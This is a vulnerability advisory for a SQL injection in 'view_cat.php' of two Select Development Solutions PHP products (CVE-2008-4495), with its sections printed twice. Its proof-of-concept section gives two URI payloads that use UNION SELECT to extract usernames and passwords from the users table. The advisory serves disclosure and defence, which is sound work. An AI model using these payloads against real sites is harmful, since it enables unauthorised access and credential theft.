Select Development Solutions Multiple Products 'view_cat.php' SQL Injection Vulnerability
BID:31623
Info
Select Development Solutions Multiple Products 'view_cat.php' SQL Injection Vulnerability
| Bugtraq ID: | 31623 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4495 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 07 2008 12:00AM |
| Updated: | May 07 2015 05:22PM |
| Credit: | Mr.SQL |
| Vulnerable: |
Select Development Solutions PHP Realtor 1.5 Select Development Solutions PHP Auto Dealer 2.7 |
| Not Vulnerable: | |
Discussion
Select Development Solutions Multiple Products 'view_cat.php' SQL Injection Vulnerability
Multiple Select Development Solutions products are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise an application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following applications are vulnerable:
PHP Realtor 1.5.0
PHP Auto Dealer 2.7.0
Multiple Select Development Solutions products are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise an application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following applications are vulnerable:
PHP Realtor 1.5.0
PHP Auto Dealer 2.7.0
Exploit / POC
Select Development Solutions Multiple Products 'view_cat.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/view_cat.php?v_cat=1+union+select+concat_ws(0x3a,username,password)MrSQL+from+users+limit+1,1--
http://www.example.com/view_cat.php?v_cat=-1/**/UNION/**/SELECT/**/CONCAT_WS(0x3a,username,password)MrSQL/**/FROM/**/users/**/limit+1,1--
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/view_cat.php?v_cat=1+union+select+concat_ws(0x3a,username,password)MrSQL+from+users+limit+1,1--
http://www.example.com/view_cat.php?v_cat=-1/**/UNION/**/SELECT/**/CONCAT_WS(0x3a,username,password)MrSQL/**/FROM/**/users/**/limit+1,1--
Solution / Fix
Select Development Solutions Multiple Products 'view_cat.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Select Development Solutions Multiple Products 'view_cat.php' SQL Injection Vulnerability
References:
References:
- Vendor Homepage (Select Development Solutions)